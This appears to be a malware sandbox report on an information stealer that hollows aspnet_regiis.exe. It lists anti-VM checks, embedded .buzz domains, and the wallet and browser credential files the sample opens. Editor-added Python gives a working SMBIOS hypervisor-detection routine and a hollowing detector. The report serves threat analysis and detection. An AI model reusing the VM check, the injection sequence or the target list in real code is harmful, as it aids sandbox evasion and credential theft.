                Source: aspnet_regiis.exe, 00000002.00000003.1761526878.0000000004F08000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ForcesLangi.exe ReversingLabs: Detection: 52%
                Source: unknown Process created: C:\Users\user\Desktop\ForcesLangi.exe "C:\Users\user\Desktop\ForcesLangi.exe"
                Source: C:\Users\user\Desktop\ForcesLangi.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\ForcesLangi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                Source: C:\Users\user\Desktop\ForcesLangi.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\ForcesLangi.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\ForcesLangi.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\ForcesLangi.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\ForcesLangi.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\ForcesLangi.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\ForcesLangi.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\ForcesLangi.exe Section loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: winhttp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: webio.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: sspicli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: schannel.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: mskeyprotect.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ntasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ncrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ncryptsslp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: msasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: gpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: amsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: userenv.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: profapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: version.dll
                Source: ForcesLangi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: ForcesLangi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00757069 push es; retf 2_2_00757074
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075C990 push eax; mov dword ptr [esp], 5C5D5E5Fh2_2_0075C99E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0073B324 push F3B90076h; retf 2_2_0073B32A
                Source: ForcesLangi.exeStatic PE information: section name: .text entropy: 7.114943161114869
                Source: C:\Users\user\Desktop\ForcesLangi.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory allocated: FD0000 memory reserve, memory write watch
Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory allocated: 2C10000 memory reserve, memory write watch
Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory allocated: 2A20000 memory reserve, memory write watch
Source: C:\Users\user\Desktop\ForcesLangi.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Users\user\Desktop\ForcesLangi.exe TID: 4268 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 2132 | Thread sleep time: -150000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\ForcesLangi.exe | Code function: 0_2_6CE331E0 FindFirstFileExW (0_2_6CE331E0)
Source: aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866718018.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866718018.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWo9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | API call chain: ExitProcess graph end node (graph_2-14368)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_0075E110 LdrInitializeThunk (2_2_0075E110)
Source: C:\Users\user\Desktop\ForcesLangi.exe | Code function: 0_2_6CE313FC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter (0_2_6CE313FC; 2 occurrences)
Source: C:\Users\user\Desktop\ForcesLangi.exe | Code function: 0_2_6CE32D21 mov eax, dword ptr fs:[00000030h] (0_2_6CE32D21)
Source: C:\Users\user\Desktop\ForcesLangi.exe | Code function: 0_2_6CE31AE2 mov eax, dword ptr fs:[00000030h] (0_2_6CE31AE2)
Source: C:\Users\user\Desktop\ForcesLangi.exe | Code function: 0_2_6CE2E9E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess (0_2_6CE2E9E7)
Source: C:\Users\user\Desktop\ForcesLangi.exe | Code function: 0_2_6CE2EF12 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter (0_2_6CE2EF12)
Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory allocated: page read and write, page guard
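The "System information queried: FirmwareTableInformation" entry above is what a VM check built on GetSystemFirmwareTable looks like from the sandbox side: the 'RSMB' provider returns the raw SMBIOS tables, and the code searches their strings for hypervisor vendors (the same class of check as the Win32_BIOS and Win32_VideoController WMI queries). The parser below is an added example written for this page, not code recovered from the sample; the two SMBIOS blobs it checks are constructed, and the marker list is the editor's, since the sample's own list is not known. One caveat on the "Hyper-V RAW" string flagged above: that is also the display name of the Hyper-V socket provider in the Winsock catalog of stock Windows 10 and later, so on its own it is weak evidence of a VM check.

```python
"""
Added example (editor's code, not from the sample or the sandbox): what a
"firmware table" VM check sees.  GetSystemFirmwareTable('RSMB') returns a
RawSMBIOSData header followed by the SMBIOS structure table; the check walks
the structures and searches their strings for hypervisor vendor markers.
The two blobs at the bottom are constructed for this example.
"""
import struct
import sys
from typing import Dict, List

# Marker list assembled by the editor; the sample's own list is not known.
VM_MARKERS = ("vmware", "virtualbox", "innotek", "qemu", "bochs", "xen",
              "virtual machine", "kvm", "parallels", "hyper-v")
SMBIOS_TYPE_NAMES = {0: "BIOS", 1: "System", 2: "Baseboard", 3: "Chassis"}
END_OF_TABLE = 127


def parse_smbios_table(table: bytes) -> List[Dict]:
    """Walk SMBIOS structures: 4-byte header (type, length, handle), a formatted
    area of `length` bytes in total, then NUL-terminated strings ended by an
    extra NUL (an empty string set is just two NULs)."""
    structures: List[Dict] = []
    off = 0
    while off + 4 <= len(table):
        stype, length, handle = struct.unpack_from("<BBH", table, off)
        if length < 4 or off + length > len(table):
            raise ValueError(f"malformed SMBIOS structure at offset {off:#x}")
        pos = off + length
        strings: List[str] = []
        while True:
            end = table.index(b"\x00", pos)      # ValueError if unterminated
            if end == pos:                       # empty string ends the set
                break
            strings.append(table[pos:end].decode("ascii", "replace"))
            pos = end + 1
        structures.append({"type": stype, "handle": handle, "strings": strings})
        if stype == END_OF_TABLE:
            break
        off = pos + (1 if strings else 2)       # skip the set terminator
    return structures


def parse_raw_smbios(raw: bytes) -> List[Dict]:
    """raw is RawSMBIOSData: u8 Used20CallingMethod, u8 SMBIOSMajorVersion,
    u8 SMBIOSMinorVersion, u8 DmiRevision, u32 Length, then the table."""
    if len(raw) < 8:
        raise ValueError("RawSMBIOSData header truncated")
    length = struct.unpack_from("<I", raw, 4)[0]
    return parse_smbios_table(raw[8:8 + length])


def vm_indicators(structures: List[Dict]) -> List[str]:
    """Strings in the BIOS/System/Baseboard/Chassis records naming a hypervisor."""
    hits: List[str] = []
    for s in structures:
        name = SMBIOS_TYPE_NAMES.get(s["type"])
        if name is None:
            continue
        for text in s["strings"]:
            marker = next((m for m in VM_MARKERS if m in text.lower()), None)
            if marker is not None:
                hits.append(f"{name}: {text!r} matches {marker!r}")
    return hits


def looks_like_vm(raw: bytes) -> bool:
    return bool(vm_indicators(parse_raw_smbios(raw)))


def read_windows_smbios() -> bytes:
    """Windows only: fetch the real buffer.  GetSystemFirmwareTable wraps the
    NtQuerySystemInformation(SystemFirmwareTableInformation) call that the
    report records as 'System information queried: FirmwareTableInformation'."""
    import ctypes
    k32 = ctypes.windll.kernel32
    rsmb = 0x52534D42                           # 'RSMB' provider signature
    size = k32.GetSystemFirmwareTable(rsmb, 0, None, 0)
    buf = ctypes.create_string_buffer(size)
    k32.GetSystemFirmwareTable(rsmb, 0, buf, size)
    return buf.raw


# ---- constructed blobs (not captured from this analysis) -------------------
def _structure(stype: int, handle: int, body: bytes, strings: List[str]) -> bytes:
    header = struct.pack("<BBH", stype, 4 + len(body), handle)
    tail = (b"".join(s.encode("ascii") + b"\x00" for s in strings) + b"\x00"
            if strings else b"\x00\x00")
    return header + body + tail


def _raw_smbios(*structures: bytes) -> bytes:
    table = b"".join(structures)
    return struct.pack("<BBBBI", 0, 3, 2, 0, len(table)) + table


# Type 0: vendor(str 1), version(str 2), start segment, release date(str 3), ROM size, 8 flag bytes
_BIOS_BODY = bytes([1, 2]) + struct.pack("<H", 0xE000) + bytes([3, 0]) + b"\x00" * 8
# Type 1: manufacturer..serial (str 1-4), 16-byte UUID, wake-up type, SKU(str 5), family(str 6)
_SYSTEM_BODY = bytes([1, 2, 3, 4]) + b"\x00" * 16 + bytes([6, 5, 6])

SAMPLE_VM = _raw_smbios(
    _structure(0, 0, _BIOS_BODY, ["innotek GmbH", "VirtualBox", "12/01/2006"]),
    _structure(1, 1, _SYSTEM_BODY, ["innotek GmbH", "VirtualBox", "1.2", "0",
                                    "Not Specified", "Virtual Machine"]),
    _structure(END_OF_TABLE, 2, b"", []),
)
SAMPLE_BARE_METAL = _raw_smbios(
    _structure(0, 0, _BIOS_BODY, ["Dell Inc.", "1.21.0", "06/15/2023"]),
    _structure(1, 1, _SYSTEM_BODY, ["Dell Inc.", "Latitude 7420", "Not Specified",
                                    "ABC1234", "Notebook", "Latitude"]),
    _structure(END_OF_TABLE, 2, b"", []),
)

if __name__ == "__main__":
    raw = read_windows_smbios() if sys.platform == "win32" else SAMPLE_VM
    for hit in vm_indicators(parse_raw_smbios(raw)) or ["no hypervisor markers"]:
        print(hit)
```

Run on a Windows host the script reads the live table; elsewhere it parses the constructed VirtualBox-style blob. Sandboxes that want to defeat this check have to rewrite the BIOS and System strings in the firmware tables, not just the WMI views, because the malware reads the raw SMBIOS bytes directly.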

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 720000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 720000 value starts with: 4D5A
Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: hummskitnj.buzz
Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: cashfuzysao.buzz
Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: appliacnesot.buzz
Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: screwamusresz.buzz
Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: inherineau.buzz
Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: scentniej.buzz
Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: rebuildeso.buzz
Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp | String found in binary or memory: prisonyfork.buzz
Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 720000
Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 721000
Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 762000
Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 765000
Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 773000
Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 721000
Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 762000
Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 765000
Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 773000
Source: C:\Users\user\Desktop\ForcesLangi.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 580008
Source: C:\Users\user\Desktop\ForcesLangi.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\ForcesLangi.exe | Code function: 0_2_6CE2F0D8 cpuid (0_2_6CE2F0D8)
Source: C:\Users\user\Desktop\ForcesLangi.exe | Queries volume information: C:\Users\user\Desktop\ForcesLangi.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\ForcesLangi.exe | Code function: 0_2_6CE2EB5B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter (0_2_6CE2EB5B)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
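The injection entries in this section form one sequence: ForcesLangi.exe starts aspnet_regiis.exe with no command-line switches (the child's command line is just its own quoted path), allocates an execute/read/write region at base 720000 in that process, writes a buffer beginning with 4D5A (the "MZ" DOS header) to the region's base, writes further blocks at 721000, 762000, 765000 and 773000, and finally writes to 580008, an address outside the allocated image. A trailing 4-byte write at an offset of 8 into an unrelated page is the shape of a PEB.ImageBaseAddress patch in process hollowing; that reading is an inference from the addresses, not something the report states. Sysmon records none of these memory operations, so the correlation has to run over an API trace of the kind the sandbox produces. The code below is an added example written for this page (not the sandbox's or the sample's code): it replays events constructed from the lines above and fires a rule per stage. The allocation size, the payload bytes other than the MZ prefix, and the benign comparison run are assumptions.

```python
"""
Added example (editor's code, not from the sandbox or the sample): the
correlation an EDR or sandbox post-processor applies to the events listed
above.  EVENTS is built from the addresses in this section; the allocation
size (0x60000), the written bytes other than the 4D5A prefix, and the benign
comparison run are assumptions.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
WRITABLE_EXEC = {PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}
MZ = b"MZ"   # 0x4D 0x5A, the DOS header magic the report saw at base 720000

# .NET Framework utilities that are command-line tools: a run with no switches
# has no normal purpose and is a common injection host.  Editor's list; the
# report itself shows only aspnet_regiis.exe.
CLI_ONLY_HOSTS = {"aspnet_regiis.exe", "aspnet_compiler.exe", "regasm.exe",
                  "regsvcs.exe", "installutil.exe", "cvtres.exe"}


@dataclass
class Event:
    kind: str                       # process_create | remote_alloc | remote_write
    source: str                     # acting process image
    target: str                     # process acted upon / spawned
    cmdline: str = ""
    base: int = 0
    size: int = 0
    protect: int = 0
    data: bytes = b""


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _user_writable(path: str) -> bool:
    p = path.lower()
    return p.startswith("c:\\users\\") or p.startswith("c:\\programdata\\")


def _region_for(regions: Dict[Tuple[str, int], int], target: str, addr: int) -> Optional[int]:
    for (tgt, base), size in regions.items():
        if tgt == target.lower() and base <= addr < base + size:
            return base
    return None


def detect_injection(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule, detail) pairs.  Rules fire independently, so a partial
    trace (no process_create in view) still yields the memory findings."""
    findings: List[Tuple[str, str]] = []
    rwx_regions: Dict[Tuple[str, int], int] = {}
    for e in events:
        if e.kind == "process_create":
            # command line that is nothing but the quoted image path
            no_switches = e.cmdline.strip().strip('"').lower() == e.target.lower()
            if _basename(e.target) in CLI_ONLY_HOSTS and no_switches and _user_writable(e.source):
                findings.append(("cli_host_spawned_without_arguments",
                                 f"{e.source} started {_basename(e.target)} with no arguments"))
        elif e.kind == "remote_alloc":
            if e.protect in WRITABLE_EXEC and e.source.lower() != e.target.lower():
                rwx_regions[(e.target.lower(), e.base)] = e.size
                findings.append(("remote_rwx_allocation",
                                 f"{e.size:#x} bytes RWX at {e.base:#x} in {_basename(e.target)}"))
        elif e.kind == "remote_write":
            region = _region_for(rwx_regions, e.target, e.base)
            if region is None:
                # A write outside any region the writer allocated: in hollowing
                # this is commonly the PEB.ImageBaseAddress patch (PEB+8 on x86).
                findings.append(("remote_write_outside_allocated_region",
                                 f"{len(e.data)} bytes at {e.base:#x} in {_basename(e.target)}"))
            elif e.base == region and e.data[:2] == MZ:
                findings.append(("pe_image_written_to_remote_rwx",
                                 f"MZ header at {e.base:#x} in {_basename(e.target)}"))
    return findings


def verdict(events: List[Event]) -> str:
    rules = {rule for rule, _ in detect_injection(events)}
    if {"remote_rwx_allocation", "pe_image_written_to_remote_rwx"} <= rules:
        if "cli_host_spawned_without_arguments" in rules:
            return "pe_injection_into_spawned_host"
        return "pe_injection"
    return "benign" if not rules else "suspicious"


PARENT = r"C:\Users\user\Desktop\ForcesLangi.exe"
HOST = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

# Constructed from the report's lines; ordering, size and payload bytes assumed.
EVENTS = [
    Event("process_create", PARENT, HOST, cmdline=f'"{HOST}"'),
    Event("remote_alloc", PARENT, HOST, base=0x720000, size=0x60000, protect=PAGE_EXECUTE_READWRITE),
    Event("remote_write", PARENT, HOST, base=0x720000, data=b"MZ\x90\x00" + b"\x00" * 60),
    Event("remote_write", PARENT, HOST, base=0x721000, data=b"\xcc" * 16),
    Event("remote_write", PARENT, HOST, base=0x762000, data=b"\xcc" * 16),
    Event("remote_write", PARENT, HOST, base=0x765000, data=b"\xcc" * 16),
    Event("remote_write", PARENT, HOST, base=0x773000, data=b"\xcc" * 16),
    Event("remote_write", PARENT, HOST, base=0x580008, data=(0x720000).to_bytes(4, "little")),
]
# Assumed benign comparison: an administrator registering ASP.NET from a prompt.
BENIGN_EVENTS = [Event("process_create", r"C:\Windows\System32\cmd.exe", HOST, cmdline=f'"{HOST}" -i')]

if __name__ == "__main__":
    for rule, detail in detect_injection(EVENTS):
        print(f"{rule}: {detail}")
    print("verdict:", verdict(EVENTS))
```

The parent/child rule is the only one of the four that ordinary process-creation telemetry (Sysmon event 1, Windows 4688 with command-line auditing) can reproduce, and it is worth a standalone hunt: aspnet_regiis.exe launched from a user-writable path with an empty argument list has no administrative use.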

                Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: aspnet_regiis.exe PID: 4820, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.binstr, type: MEMORYSTR
Source: aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
Source: aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
Source: aspnet_regiis.exe | String found in binary or memory: Jaxx Liberty
Source: aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
Source: aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
Source: aspnet_regiis.exe, 00000002.00000002.1893702239.0000000002A2C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: aspnet_regiis.exe, 00000002.00000003.1831814063.0000000002A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
